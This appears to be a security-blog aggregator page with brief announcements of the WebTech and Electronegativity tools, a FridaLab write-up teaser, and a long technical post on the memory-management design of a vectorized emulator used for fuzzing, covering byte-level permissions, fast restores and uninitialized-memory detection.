WebTech, identify technologies used on websites

8 March 2019 at 00:37
Introduction We’re very proud to release WebTech as open-source software. WebTech is a Python tool that can identify web technologies by visiting a given website, parsing a single response file, or replaying a request described in a text file. This way you can have reproducible results and minimize the requests you need to make to a target website. The RECON phase is one of the most important phases of a Penetration Test.

FridaLab – Writeup

4 February 2019 at 15:20
Today I solved FridaLab, a playground Android application for playing with Frida and testing your skills. The app is made of various challenges, with increasing difficulty, that will guide you through Frida’s potential. This is a writeup with solutions to the challenges in FridaLab. We suggest that readers take a look at it and try to solve it on their own before reading further. In this writeup we assume that the reader has a working environment, with frida-server already installed on the Android device and frida-tools installed on the PC, since we will not cover those topics.

Electronegativity is finally out!

23 January 2019 at 23:00

We’re excited to announce the public release of Electronegativity, an open-source tool capable of identifying misconfigurations and security anti-patterns in Electron-based applications.

Electronegativity is the first-of-its-kind tool that can help software developers and security auditors detect and mitigate potential weaknesses in Electron applications.

If you’re simply interested in trying out Electronegativity, go ahead and install it using NPM:

$ npm install @doyensec/electronegativity -g

To review your application, use the following command:

$ electronegativity -i /path/to/electron/app

Results are displayed in a compact table, with references to application files and our knowledge-base.

Electronegativity Demo

The remainder of this blog post provides more details on the public release and introduces its current features.

A bit of history

Back in July 2017 at the BlackHat USA Briefings, we presented the first comprehensive study on Electron security where we primarily focused on framework-level vulnerabilities and misconfigurations. As part of our research journey, we also created a checklist of security anti-patterns and must-have features to illustrate misconfigurations and vulnerabilities in Electron-based applications.

With that, Claudio Merloni and I started developing the first prototype for Electronegativity. Immediately after the BlackHat presentation, we received a lot of great feedback and new ideas on how to evolve the tool. Back home, we started working on those improvements until we realized that we had to rethink the overall design. The code repository was made private again and only minor refinements were made in between customer projects.

In the summer of 2018, we hired Doyensec’s first intern - Ibram Marzouk who started working on the tool again. Later, Jaroslav Lobacevski joined the project team and pushed Electronegativity to the finish line. Claudio, Ibram and Jaroslav, thanks for your contributions!

While certainly overdue, we’re happy that we eventually managed to release the tool in better shape. We believe that Electron is here to stay and hopefully Electronegativity will become a useful companion for all Electron developers out there.

How Does It Work?

Electronegativity leverages AST / DOM parsing to look for security-relevant configurations. Checks are standalone files, which makes the tool modular and extensible.

Building a new check is relatively easy too. We support three “families” of checks (JavaScript, HTML, and JSON checks, as reflected in the check names below), so that the tool can analyze all resources within an Electron application.

When you scan an application, the tool will unpack all resources (if applicable) and perform an audit using all registered checks. Results can be displayed in the terminal, or exported as CSV or in SARIF format.

Supported Checks

Electronegativity currently implements the following checks. A knowledge-base containing information around risk and auditing strategy has been created for each class of vulnerabilities:

  1. ALLOWPOPUPS_HTML_CHECK
  2. AUXCLICK_JS_CHECK
  3. AUXCLICK_HTML_CHECK
  4. BLINK_FEATURES_JS_CHECK
  5. BLINK_FEATURES_HTML_CHECK
  6. CERTIFICATE_ERROR_EVENT_JS_CHECK
  7. CERTIFICATE_VERIFY_PROC_JS_CHECK
  8. CONTEXT_ISOLATION_JS_CHECK
  9. CUSTOM_ARGUMENTS_JS_CHECK
  10. DANGEROUS_FUNCTIONS_JS_CHECK
  11. ELECTRON_VERSION_JSON_CHECK
  12. EXPERIMENTAL_FEATURES_HTML_CHECK
  13. EXPERIMENTAL_FEATURES_JS_CHECK
  14. HTTP_RESOURCES_JS_CHECK
  15. HTTP_RESOURCES_HTML_CHECK
  16. INSECURE_CONTENT_HTML_CHECK
  17. INSECURE_CONTENT_JS_CHECK
  18. NODE_INTEGRATION_HTML_CHECK
  19. NODE_INTEGRATION_EVENT_JS_CHECK
  20. NODE_INTEGRATION_JS_CHECK
  21. OPEN_EXTERNAL_JS_CHECK
  22. PERMISSION_REQUEST_HANDLER_JS_CHECK
  23. PRELOAD_JS_CHECK
  24. PROTOCOL_HANDLER_JS_CHECK
  25. SANDBOX_JS_CHECK
  26. WEB_SECURITY_HTML_CHECK
  27. WEB_SECURITY_JS_CHECK

Leveraging these 27 checks, Electronegativity is already capable of identifying many vulnerabilities in real-life applications. Going forward, we will keep improving the detection and updating the tool to keep pace with the fast-changing Electron framework. Start using Electronegativity today!

Vectorized Emulation: MMU Design

19 November 2018 at 19:10

Softserve

New vectorized emulator codenamed softserve

Tweeter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up.

Check out the intro

This is the continuation of a multipart series. See the introduction post here

This post assumes you’ve read the intro and doesn’t explain some of the basics of the vectorized emulation concept. Go read it if you haven’t!

Further this blog is a lot more technical than the introduction. This is meant to go deep enough to clear up most/all potential questions about the MMU. It expects that you have a general knowledge of page tables and virtual addressing models. Hopefully we do a decent job explaining these things such that it’s not a hard requirement!

The code

This blog explains the intent behind a pretty complex MMU design. The code that this blog references can be found here. I have no plans to open source the vectorized emulator and this MMU is just a snapshot of what this blog is explaining. I have no intent to update this code as I change my MMU model. Further this code is not buildable as I’m not open sourcing my assembler, however I assume the syntax is pretty obvious and can be read as pseudocode.

By sharing this code I can talk at a higher level and allow the nitty-gritty details to be explained by the actual implementation.

It’s also important to note that this code is not being used in production yet. It’s got room for micro-optimizations and polish. At least it should be doing the correct operations and hopefully the tests are verifying this. Right now I’m trying to keep it simple to make sure it’s correct and then polish it later using this version as reference.

Intro

Today we’re going to talk about the internals of the memory management unit (MMU) design I have used in my vectorized emulator. The MMU is responsible for creating the fake memory environment of the VMs that run under the emulator. Further, the MMU used here is also designed to catch bugs as early as possible. To do this we implement what I call a “byte-level MMU”, where each byte has its own permission bits. Since vectorized emulation is meant for fuzzing, it’s also important that the memory state can be restored to the original state quickly so a new fuzz iteration can be started.

During this blog we introduce a few big concepts:

  • Differential restores
  • Byte-level permissions
  • Read-after-write memory (uninitialized memory tracking)
  • Gage fuzzing
  • Aliased/CoW memory
  • Deduplicated memory
  • Technical details about the IL relevant to the MMU
  • Painful details about everything

Since this emulator design is meant to run multiple architectures and programs in different environments, it’s critical the MMU design supports a superset of the features of all the programs I may run. For example, system processes typically are run in the high memory ranges 0xffff... and above. Part of the design here is to make sure that a full guest address space can be used, including high memory addresses. Things like x86_64 have 48-bit address spaces, while things like ARM64 have 49-bit address spaces (2 separate 48-bit address spaces). Thus to run an ARM64 target on x86 I need to provide more bits than actually present. Luckily most systems use this address space sparsely, so by using different data structures we can support emulating these targets with ease.

The problem

Before we get into describing the solution, let’s address what the problem is in the first place!

When creating an emulator it’s important to create isolation between the emulated guest and the actual system. For example if the guest accesses memory, it’s important that it can only access its own memory, and that it isn’t overwriting the emulator’s own memory. To do this there are multiple traditional solutions:

  • Restrict the address space of the guest such that it can fit entirely in the emulator’s address space
  • Use a data structure to emulate a sparse guest’s memory space
  • Create a new process/VM with only the guest’s memory mapped in

The first solution is the simplest and fastest, but also the least portable. It typically consists of allocating a buffer the size of the guest’s address space, and then any guest memory accesses are added to the base of this buffer and ensured to not go out of bounds. A model like this can rely on the hardware’s permission checking by setting permissions via mmap or VirtualProtect. This is an extremely fast model and allows for running applications that fit inside of the emulator’s address space. When running a 64-bit VM this can become tough as most OSes do not provide a means of allocating memory in the high part of the address space 0xffff... and beyond. This memory is typically reserved for the kernel. This is the model used by things like qemu-user as it is super fast and works great for well-behaving userland applications. By setting the QEMU_GUEST_BASE environment variable you can change this base and set the size with QEMU_RESERVED_VA.
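As a rough sketch of this first model (all names below are made up for illustration and not taken from any real emulator), the whole thing boils down to one big allocation plus a bounds check:

// Minimal sketch of the "base + offset" guest memory model. The only safety
// mechanism is a bounds check (or hardware page permissions set on the
// backing buffer via mmap/VirtualProtect).
struct FlatGuestMemory {
    base: Vec<u8>, // one big allocation covering the whole guest address space
}

impl FlatGuestMemory {
    fn read_u8(&self, guest_addr: usize) -> Option<u8> {
        self.base.get(guest_addr).copied()
    }

    fn write_u8(&mut self, guest_addr: usize, val: u8) -> Option<()> {
        let slot = self.base.get_mut(guest_addr)?;
        *slot = val;
        Some(())
    }
}

fn main() {
    let mut mem = FlatGuestMemory { base: vec![0u8; 64 * 1024] };
    mem.write_u8(0x1337, 0x41).unwrap();
    assert_eq!(mem.read_u8(0x1337), Some(0x41));
    assert_eq!(mem.read_u8(0xffff_ffff), None); // out of bounds -> fault
}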

The second solution is fairly slow, but allows for more strict memory permissions than the host system allows. Typically the data structure used to access the guest’s memory is similar to traditional page table models used in hardware. However since it’s implemented in software it’s possible to change these page tables to contain any metadata or sizes as desired. This is the model I ultimately use, but with a few twists from traditional page tables.

The third solution leverages something like VT-x or a thin process to almost directly use the target hardware’s page table model for a VM. This will make the emulator tied to an architecture, might require a driver, and, like the first solution, doesn’t allow for stricter memory models. This is actually one of the first models I used in my emulator and I’ll go into it a bit more in the history section.


History

Feel free to skip this section if you don’t care about context

To give some background on how we ended up here, it’s important to go through the MMU designs used in the past. Note that the generations aren’t the same MMU improving over time; they’re just different MMUs I’ve designed.

First generation

The first generation of my MMU was a simple modification to QEMU to allow for quick tracking of which memory was modified. In this case my target was a system-level target so I was not using qemu-user, but rather qemu-system. I ripped out the core physical memory manager in QEMU and replaced it with my own that effectively mimicked the x86 page table model. I was most comfortable with the x86 page table model and since it was implemented in hardware I assumed it was probably well engineered. The only interest I had in this first MMU was to quickly gather which memory was modified so I could restore only the dirtied memory and save time during resets. This had been a huge improvement for my hypervisor so it was natural for me to just copy it over to QEMU so I could get the same benefits.

Second generation

While still continuing on QEMU modifications I started to get a bit more creative. Since I was handling all the physical memory accesses directly in software, there was no reason I couldn’t use page tables of my own shape. I switched to using a page table that supported 32-bit addresses (my targets were MIPS32 and ARM32) using 8 bits per table. This gave me 256-byte pages rather than traditional 4-KiB x86 pages, allowed me to reset dirty pages at a finer granularity, and reduced the overall work for resets.

Third generation

At this point I was tinkering around with different page table shapes to find which worked fast. But then I realized I could set the final translation page size to 1-byte and I would be able to apply permissions to any arbitrary location in memory. Since memory of the target system was still using 4-KiB pages I wasn’t able to apply byte-level permissions in the snapshotted target, however I was able to apply byte-level permissions to memory returned from hooked functions like malloc(). By setting permissions directly to the size actually requested by malloc() we could find 1-byte out-of-bounds memory accesses. This ended up finding a bug which was only slightly out-of-bounds (1 or 2 bytes), and since this was now a crash it was prioritized for use in future fuzz cases. This prioritization (or feedback) eventually ended up with the out-of-bounds growing to hundreds of bytes, which would crash even on an actual system.

Fourth generation

I ended up designing my own emulator for MIPS32, performance wasn’t really the focus. I basically copied the model I used for the 3rd generation. I also kept the 1-byte paging as by this point it was a potent tool in my toolbag. However once I switched this emulator to use JIT I started to run into some performance issues. This caused me to drop the emulated page tables and byte level permissions and switch to a direct-memory-access model.

At this time I was doing most of my development for my emulator to run directly on my OS. Since my OS didn’t follow any traditional models this allowed me to create a user-land application with almost any address space as I wanted. I directly used the MMU of the hardware to support running my JIT in the context of a different address space. In this model the JITted code just directly accessed memory, which except for a few pages in the address space, was just the exact same as the actual guest’s address space.

For example if the guest wanted to access address 0x13370000, it would just directly dereference the memory at 0x13370000. No translation, no base applied, simple.

You can see this code in the srcs/emu folder in falkervisor.

I used this model for a long time as it was ideal for performance and didn’t really restrict the guest from any unique address space shapes. I used this memory model in my vectorized emulator for quite a while as well, but with a scale applied to the address as I interleaved multiple VM’s memory.

Fifth generation

The vectorized emulator was initially designed for hard targets, and the primary goal was to extract as much information as possible from the code under test. When trying to improve its ability to find bugs I remembered that in the past I had done a byte-level MMU with much success. I had a silly idea of how I could handle these permission checks. Since in the JIT I control what code is run when doing a read or write, I could simply JIT code to do the permission checks. I decided that I would simply have 1 extra byte for every byte of the target. This byte would hold all of the permissions for the corresponding byte in the memory map (read, write, and/or execute).

Since now I needed to have 2 memory regions for this, I started to switch from using my OS and the stripped down user-land process address space to using 2 linear mappings in my process. Since this was more portable I decided to start developing my vectorized emulator to run on just Windows/Linux. On a guest memory access I would simply bounds check the address to make sure it’s in a certain range, and then add the address to the base/permission allocations. This is similar to what qemu-user does but with a permission region as well. The JIT would check these permissions by reading the permissions memory first and checking for the corresponding bits.

Sixth generation

The performance of the fifth generation MMU was pretty good for JIT, but was terrible for process start times. I would end up reserving multiple terabytes of memory for the guest address spaces. This made it take a long time to start up processes and even tear them down as they blocked until the OS cleaned up their resources. Further commit memory usage was quite high as I would commit entire 4-KiB guest pages, which were actually 128-KiB (16 vectorized VMs * 2 regions (permission and memory region) * 4 KiB). To mitigate these issues we ended up at the current design….


Page Tables

Before we hop into soft MMU design it’s important to understand what I mean when I say page tables. Page tables take some bit-slice of the address to be translated and use it as the index for an element in a first level table. This table points to another table which is then indexed by a different bit-slice of the same address. This may continue for however many levels are used in the page table. In my case the shape of this page table is dynamically configurable and we’ll go into that a bit more.

Page table

In the case of 64-bit x86 there is a 4 level lookup, where 9 bits are used for each level. This means each page table contains 512 entries. Each entry is a pointer to the next page table, or the actual page if it’s the final level. Finally the bottom 12 bits of the address are used as the offset into the page to find the specific byte. This paging model would show up as [9, 9, 9, 9, 12] according to my dynamic paging model. This syntax will be explained later.

For x86 there are alignment requirements for the page table entries (must be 4-KiB aligned). Further physical addresses are only 52-bits. This leaves 12 bits at the bottom of the page table entry and 12 bits at the top for use as metadata. x86 uses this to store information such as: If the page is present, writable, privileged, caching behavior, whether it’s been accessed/modified, whether it’s executable, etc. This metadata has no cost in hardware but in software, traversing this has a cost as the metadata must be masked off for the pointer to be extracted. This might not seem to matter but when doing billions of translations a second, the extra masking operations add up.

Here’s the actual metadata of a 4 KiB page on 64-bit Intel:

Page table metadata


The overall design

My vectorized emulator is being rewritten to be 64-bit rather than 32-bit. We’re now running 2048 VMs rather than 4096 VMs as we can only run 8 VMs per thread. All of this design is for 64-bits.

When designing the new MMU there were a few critical features it needed:

  • Byte level permissions
  • Fast snapshot/restore times
  • A data structure that could be quickly traversed in JIT
  • Quick process start times
  • The ability to handle full 64-bit address spaces
  • Low memory usage (we need to run 2048 VMs)
  • Quick methods for injecting fuzz inputs (we need a way to get fuzz inputs in to the memory millions of times per second)
  • Must be easily tested for correctness
  • Ability to track uninitialized memory at a byte-level
  • Read-only memory shared between all cores

Applying byte-level permissions

So we have this byte-level permission goal, but how do we actually get byte-level information to apply anyways?

Since most fuzzing is done from an already-existing snapshot from a real system with 4 KiB paging and permissions, we cannot just magically get byte-level permissions. We have to find locations that can be restricted to specific byte-level sizes.

The easiest way to do this is just ignore everything in the snapshot. We can apply byte-level permissions to only new memory allocations that we emulate by adding breakpoints to the target’s allocate routines. Further by hooking frees we can delete the mappings and catch use-after-frees.

We can get a bit more fancy if we’re enlightened as to the internals of the allocator of the target under test. Upon loading of the snapshot we could walk the heap metadata and trim down allocations to the byte-level sizes they originally requested. If the heap does not provide the requested size then this is not possible. Further allocations which fit perfectly in a bin might not have any room after them to place even a single guard byte.

To remedy these problems there are a few solutions. We can use page heap in the application we’re taking a snapshot of, which will always ensure we have a page after the allocation we can play with for guard bytes. Further, page heap stores the requested size in the metadata so we can get perfect byte-level permissions applied.

If page heap is not available for the allocator you’re gonna have to get really creative and probably replace the allocator. You could also hack it up and use a debugger to always add a few bytes to each allocation (ensuring room for guard bytes), while logging the requested sizes. This information could then be used to create a perfect byte heap.

Getting even fancier

When going at a really hard target you could also start to add guard bytes between padding fields of structures (using symbol information or compiler plugins) and globals. The more you restrict, the more you can detect.


Design features

Basics of the vectorized model

This was covered in the intro, but since it’s directly applicable to the MMU it’s important to mention here.

Memory between the different lanes on a given core is interleaved at the 8-byte level (4-byte level for 32-bit VMs). This means that when accessing the same address on all VMs we’re able to dispatch a single read at one address to load all 8 VMs’ memory. This has the downside of unaligned memory accesses being much more expensive as they now require multiple loads. However in the common case most memory is accessed at the same address and does not straddle an 8-byte boundary. It’s worth it.

For reference, the cost of a single vmovdqa64 load instruction is about 4-5 cycles, whereas a vpgatherqq load is 20-30 cycles. Unless memory is very frequently accessed from different addresses or straddles 8-byte boundaries, it is always worth interleaving.

VM interleaving looks as follows:

chart simplified to show 4 lanes instead of 8

Guest Address | Host Address | Qword 1 | Qword 2 | Qword 3 | ... | Qword 8
0x0000        | 0x0000       |       1 |       2 |       3 | ... |      33
0x0008        | 0x0040       |      32 |      74 |      55 | ... |      45
0x0010        | 0x0080       |      24 |      24 |      24 | ... |      24

This interleaves all the memory between the VMs at an 8-byte level. If a memory access straddles an 8-byte value things get quite slow but this is a rare case and we’re not too concerned about it.
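To make the table above concrete, here is a small sketch of the interleaving math it implies, assuming 8 lanes of 64-bit VMs (the helper name is hypothetical):

// Sketch of the interleaving math implied by the table above.
const LANES: u64 = 8;  // VMs interleaved per hardware thread
const STRIDE: u64 = 8; // bytes per lane per interleaved qword row

// Host byte offset of `guest_addr` as seen by VM lane `lane`.
fn host_offset(guest_addr: u64, lane: u64) -> u64 {
    let row = guest_addr / STRIDE;           // which interleaved qword row
    let byte_in_qword = guest_addr % STRIDE; // offset within that qword
    row * (LANES * STRIDE) + lane * STRIDE + byte_in_qword
}

fn main() {
    // Matches the table: guest 0x0000 -> host 0x0000, 0x0008 -> 0x0040,
    // 0x0010 -> 0x0080 (all for lane 0).
    assert_eq!(host_offset(0x0000, 0), 0x0000);
    assert_eq!(host_offset(0x0008, 0), 0x0040);
    assert_eq!(host_offset(0x0010, 0), 0x0080);
    // The same guest qword for lane 3 sits 3 * 8 bytes further in.
    assert_eq!(host_offset(0x0008, 3), 0x0040 + 24);
}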

How do we build a testable model?

To start off development it was important to build a good foundation that could be easily tested. To do this I tried to write everything as naively as possible to decrease the chance of mistakes. Since performance is only really required in the JIT, the Rust-level MMU routines were written cleanly and used as the reference implementation to test against. If high-performance methods were needed for modifying memory or permissions, they would be supplemental and verified against the naive implementation. This set us up to be in good shape for testing!

64-bit address spaces

To support full 64-bit address spaces we are forced to use some data structure to handle memory as nothing in x86 can directly use a 64-bit address space. Page tables continue to be the design we go with here.

Since we were writing the code in a naive way, it was easy to make most of the MMU model configurable by constants in the code. For example the shape of the page tables is defined by a constant called PAGE_TABLE_LAYOUT. This is used in reality in the form: const PAGE_TABLE_LAYOUT: [u32; PAGE_TABLE_DEPTH] = [16, 16, 16, 13, 3];.

This array defines the number of bits used for translating each level in the page table, and PAGE_TABLE_DEPTH sets the number of levels in the page table. The example above shows that we use the top 16 bits as the index into the first level, the next 16 bits for the next level, the next 16 bits again for another level, then a 13-bit level, and finally a 3-bit page offset (8-byte pages). As long as this PAGE_TABLE_LAYOUT adds up to 64 bits, contains at least 2 entries (a 1-level page table), and has a final translation size of at least 8 bytes (as in the example), the MMU and JITs will adapt accordingly. This allows a specific target to be profiled and the page table shape changed to whatever works best. It also allows trading performance for memory usage, and vice versa, as needed.
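As a minimal sketch (simplified types, no page table walk, no permissions or interleaving), here is how a layout like this slices a 64-bit address into per-level indices:

// Sketch of slicing a 64-bit guest address according to PAGE_TABLE_LAYOUT.
const PAGE_TABLE_DEPTH: usize = 5;
const PAGE_TABLE_LAYOUT: [u32; PAGE_TABLE_DEPTH] = [16, 16, 16, 13, 3];

// Split `addr` into one index per level plus the final page offset.
fn split_address(addr: u64) -> [u64; PAGE_TABLE_DEPTH] {
    let mut indices = [0u64; PAGE_TABLE_DEPTH];
    let mut remaining_bits = 64u32;
    for (lvl, &bits) in PAGE_TABLE_LAYOUT.iter().enumerate() {
        remaining_bits -= bits;
        indices[lvl] = (addr >> remaining_bits) & ((1u64 << bits) - 1);
    }
    indices
}

fn main() {
    // With [16, 16, 16, 13, 3] the last entry is the offset into an 8-byte page.
    let idx = split_address(0x1122_3344_5566_7788);
    assert_eq!(idx[0], 0x1122);
    assert_eq!(idx[1], 0x3344);
    assert_eq!(idx[2], 0x5566);
    assert_eq!(idx[3], 0x7788 >> 3);
    assert_eq!(idx[4], 0x7788 & 0x7);
}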

Fast restores

When writing my hypervisor I walked the SVM page tables looking for dirty pages to restore. On x86 there are only dirty bits on the last level of the page tables. For all other levels there’s only an ‘accessed’ bit (updated when the translation is used for any access). I would walk every entry in each page table, if it was accessed I would recurse to the next level, otherwise skip it, at the final level I would check for the dirty bit and only restore the memory if it was marked as dirty. This meant I walked the page tables for all the memory that was ever used, but only restored dirty memory. Walking the page tables caused quite a bit of cache pollution which would cause significant damage to the performance of other cores.

To speed this up I could potentially place a dirty bit on every page table level, and then I would only ever start walking a path that contains a dirty page. I used this model at some point historically, however I’ve got a better model now.

Instead of walking page tables, I now just append the address to a vector when I first set a dirty bit. This means when resetting a VM I only read a linear array of addresses to restore. I still need a dirty bit somewhere so I make sure I don’t add duplicates to this list. Since I no longer need to walk page tables I only put dirty bits on the final level. This was a decision driven by actual data on real targets; it’s much faster.

If during execution I run out of entries in this dirty list I exit out of the VM with a special VM-exit status indicating this list is full. This then allows me to append this list at Rust-level to a dynamically sized allocation. Since the size of this list is tunable it would grow as needed and converge to never hitting VM-exits due to dirty list exhaustion. Further this dirty list is typically pretty tiny so the cost isn’t that high.
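Here is a minimal sketch of that dirty-list bookkeeping (the names and structure are hypothetical; the real version lives in the JIT and also records the translated address):

// Minimal sketch of the dirty-list bookkeeping described above.
struct DirtyState {
    dirty_list: Vec<u64>, // fixed-capacity list of dirtied page addresses
    capacity: usize,      // tunable; exhaustion forces a special VM exit
}

enum WriteOutcome {
    Ok,
    DirtyListFull, // VM-exit so Rust-level code can grow/drain the list
}

impl DirtyState {
    // Called on a write to a page; the dirty bit filters out duplicates.
    fn mark_dirty(&mut self, page_addr: u64, dirty_bit: &mut bool) -> WriteOutcome {
        if *dirty_bit {
            // Already dirty: nothing to do, no duplicate entry is added.
            return WriteOutcome::Ok;
        }
        if self.dirty_list.len() == self.capacity {
            return WriteOutcome::DirtyListFull;
        }
        *dirty_bit = true;
        self.dirty_list.push(page_addr);
        WriteOutcome::Ok
    }
}

fn main() {
    let mut state = DirtyState { dirty_list: Vec::new(), capacity: 2 };
    let mut dirty_bit = false;
    assert!(matches!(state.mark_dirty(0x1000, &mut dirty_bit), WriteOutcome::Ok));
    // A second write to the same page is filtered by the dirty bit.
    assert!(matches!(state.mark_dirty(0x1000, &mut dirty_bit), WriteOutcome::Ok));
    assert_eq!(state.dirty_list.len(), 1);
}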

Interestingly Intel introduced (not sure if it’s in silicon yet) a way of getting a similar thing for VMs (this is called Page Modification Logging). The processor itself will give you a linear list of dirty pages. We do not use this as it is not supported in the processor we are using.

Permissions

On classic x86 (and really any other architecture) permissions bits are added at each level of the page table. This allows for the processor to abort a page table walk early, and also allows OSes to change permissions for large regions of memory by updating a single entry. However since we’re running multiple VM’s at the same time it’s possible each VM has different memory mapped in. To handle this we need a permission byte for each byte for each VM.

Since we can’t handle the permissions checks during the page table walk (technically could be possible if the permissions are a superset of all the VM’s permissions), we get to have a metadata-less page table walk until the final level where we store the dirty bit. This means that during a page table walk we do not need to mask off bits, we can just directly keep dereferencing.

There are currently 4 permission bits. A read bit, a write bit, an execute bit, and a RaW bit (see next section). All of these bits are completely independent. This allows for arbitrary permission sets like write-only memory, and execute-only memory.
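As an illustration, a hypothetical encoding of these bits (the design doesn’t depend on any specific bit positions) and a byte-level read check could look like:

// Hypothetical bit assignments for the four per-byte permission bits.
const PERM_READ:  u8 = 1 << 0;
const PERM_WRITE: u8 = 1 << 1;
const PERM_EXEC:  u8 = 1 << 2;
const PERM_RAW:   u8 = 1 << 3; // read-after-write, see next section

// Every byte touched by a read must have the read bit set.
fn check_read(perms: &[u8]) -> bool {
    perms.iter().all(|&p| p & PERM_READ != 0)
}

fn main() {
    // Since the bits are fully independent, write-only memory is expressible.
    let write_only = [PERM_WRITE; 4];
    assert!(!check_read(&write_only)); // reads of write-only memory fault
    // RaW memory is not readable until it has been written.
    let raw_uninit = [PERM_RAW | PERM_WRITE; 4];
    assert!(!check_read(&raw_uninit));
    assert!(check_read(&[PERM_READ | PERM_EXEC; 2]));
}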

In some older versions of my MMU I had a page table for both permissions and data. This is pretty pointless as they always have the same shape. This caused me to perform 2 page table walks for every single memory access.

In the new model I interleave the memory and permissions for the VMs such that one walk will give me access to the permissions and memory contents. Further, in memory the permissions come first, followed by the contents. Since permissions are checked first this allows for the memory to be accessed linearly and potentially get a speedup from the hardware prefetchers.

When permissions and contents are laid out in a pretty format it looks something like:

MMU layout (simplified to 4 lanes instead of 8)

We can see every byte of contents has a byte of permissions and the permissions come first in memory. This image displays directly how the memory looks if you were to dump the MMU region for a page as qwords.

Uninitialized memory tracking

To track uninitialized memory I introduce a new permission bit called the RaW (read-after-write) bit. This bit indicates that memory is only readable after it has been written to. In allocator hooks or by manual application to regions of memory this bit can be set and the read bit cleared.

On all writes to memory the RaW bit is unconditionally copied to the read bit. It’s done unconditionally because it’s cheaper to shift-and-or every time than to have a conditional operation.

Simple as that, now memory marked as RaW and non-readable will become readable on writes! Just like all other permission bits this is byte-level. malloc()ing 8 bytes, writing one byte to it, and then reading all 8 bytes will cause an uninitialized memory fault!
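Using the same hypothetical bit positions as the earlier sketch, the unconditional shift-and-or on every write looks roughly like this:

// Hypothetical bit positions; only the shift distance depends on them.
const PERM_READ:  u8 = 1 << 0;
const PERM_WRITE: u8 = 1 << 1;
const PERM_RAW:   u8 = 1 << 3;

// Applied to every permission byte covered by a write: if the RaW bit is
// set, the read bit becomes set; otherwise nothing changes. No branch needed.
fn propagate_raw_on_write(perm: u8) -> u8 {
    perm | ((perm & PERM_RAW) >> 3)
}

fn main() {
    let uninit = PERM_RAW | PERM_WRITE;       // RaW + writable, not yet readable
    let after_write = propagate_raw_on_write(uninit);
    assert!(after_write & PERM_READ != 0);    // now readable
    // Bytes without the RaW bit are left untouched.
    assert_eq!(propagate_raw_on_write(PERM_WRITE), PERM_WRITE);
}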


Gage fuzzing

Okay there’s probably a name for this already but I call it ‘gage’ fuzzing (from gage blocks, precisely ground measurement references). It’s a precise fuzzing technique I use where I start without a snapshot at all, but rather just the code. In this case I load up a PE/ELF, mark all writable regions as read-after-write, and point PC to a function I want to fuzz. Further I set up the parameters to the function, and if one of the parameters happens to be a pointer to memory I don’t understand yet, I can mark the contents of the pointer to read-after-write as well.

As globals and parameters are used I get faults telling me that uninitialized memory was used. This allows me to reverse out the specific fields that the function operates on as needed. Since the memory is read-after-write, if the function writes to the memory prior to reading it then I don’t have to worry what that memory is at all.

This process is extremely time consuming, but it is basically dynamic-driven reversing/source auditing. You lazily reverse the things you need to, which forces you to understand small pieces at a time. While you build understanding of the things the function uses you ultimately learn the code and learn potential places to audit more or add things like guard bytes.

This is my go-to methodology for fuzzing extremely hard targets where every advantage is required. Further this works for fuzzing codebases which are not runnable, or you only have partial snapshots of. Works great for kernel fuzzing or firmware fuzzing when you don’t have a great way of getting a snapshot!

I mention ‘function’ in this case but there’s nothing restricting you from fuzzing a whole application with this model. Things without global state can be trivially fuzzed in their entirety with a model like this. Further, I’ve done things like call the init routine for a class/program and then jump to the parser when init returns to skip some of the manual processing.


Theory into practice

So we know the features and what we want in theory, however in practice things get a lot harder. We have to abide by the design decisions while maintaining some semblance of performance and support for edge cases in the JIT.

We’ve got a few things that could make this hard to JIT. First of all, performance is going to be an issue: we need to find a way to minimize the frequency of page table walks as well as decrease the cost of a walk itself. Further we have to be able to support edge cases where VMs are disabled, pages are not present, and VMs are accessing different memory at the same time.

64-bit saves the day

Since now the vectorized emulator is 64-bit rather than 32-bit, we can hold pointers in lanes of the vector. This allows us to use the scatter and gather instructions during page table walks. However, while magical and fast at what they do, these scatter/gather instructions are much slower than their standard load/store counterparts.

Thus in the edge case where VMs are accessing different memory we are able to vectorize the page table walks. This means we’re able to perform 8 completely different page table walks at the same time. However in most cases VMs are accessing the same memory and thus it’s cheaper for us to check if we’re accessing different memory first, and either perform the same walk for all VMs (same address), or perform a vectorized page table walk with scatter/gather instructions.

In the case of differing addresses this vectorized page table walk is much faster than 8 separate walks and provides a huge advantage over the previous 32-bit model.

Handling non-present pages

Typically in most architectures there is a present bit used in the page tables to indicate that an entry is present. This really just allows them to map in the physical address NULL in page tables. Since we’re running as a user application using virtual addresses we cheat and just use the pointers for page table entries.

If an entry is NULL (64-bit zero), then we stop the walk and immediately deliver a fault. This means to perform the page table walk until the final page we simply read a page table entry, check if it’s zero, and go to the next level. No need to mask off permission/present bits. For the final level we have a dirty bit, and a few more bits which we must mask off. We’ll discuss these other bits later.

What is a page fault?

In the case of a non-present page in the page table, or a permission bit not being present for the corresponding operation we need a way to deliver a page fault. Since the VM is just effectively one big function, we’re able to set a register with a VM exit code and return out. This is an implementation detail but it’s important that a ret allows us to exit from the emulator at any time.

Further since it’s possible VMs could have different permissions or page tables, we report a caused_vmexit mask, which indicates which lanes of the vector were responsible for causing the exception. This allows us to record the results, disable the faulting VMs, and re-enter the emulator to continue running the remaining VMs.

Memory costs

Since we’re running vectorized code we interleave 8 VMs at the same time. Further there is a permission byte for every byte. We also have a minimum page size of 8-bytes. Meaning the smallest possible actual commit size for a page on a single hardware thread is 128 bytes. PAGE_SIZE (8 bytes) * NUM_VMS (8) * 2 (permission byte and content byte). This is important as a single 4096-byte x86 page is actually 64 KiB. Which is… quite large. The larger the page size the better the performance, but the higher memory usage.

Saving time and memory

We’ve discussed that the previous MMU model used was quite slow for startup and shutdown times. This meant it could take 30+ seconds to start the emulator, and another 30 seconds to exit the process. Even with a hard ctrl+c.

To remedy this, everything we do is lazy. When I say lazy I mean that we try to only ever create mappings, copies, and perform updates when absolutely required.

VMs have no memory to start off

When a VM launches it has zero memory in its MMU. This means creating a VM costs almost nothing (a few milliseconds). It creates an empty page table and that’s it.

So where does memory come from?

Since a VM starts off with no memory at all, it can’t possibly have the contents of the snapshot we are executing from. This is because only the metadata of the snapshot was processed. When the VM attempts to touch the first memory it uses (likely the memory containing the first instruction), it will raise an exception.

We’ve designed the MMU such that there is an ability to install an exception handler. This means that on an exception we can check if the input snapshot contained the memory we faulted on. If it did then we can read the memory from the snapshot and map it in. Then the VM can be resumed.

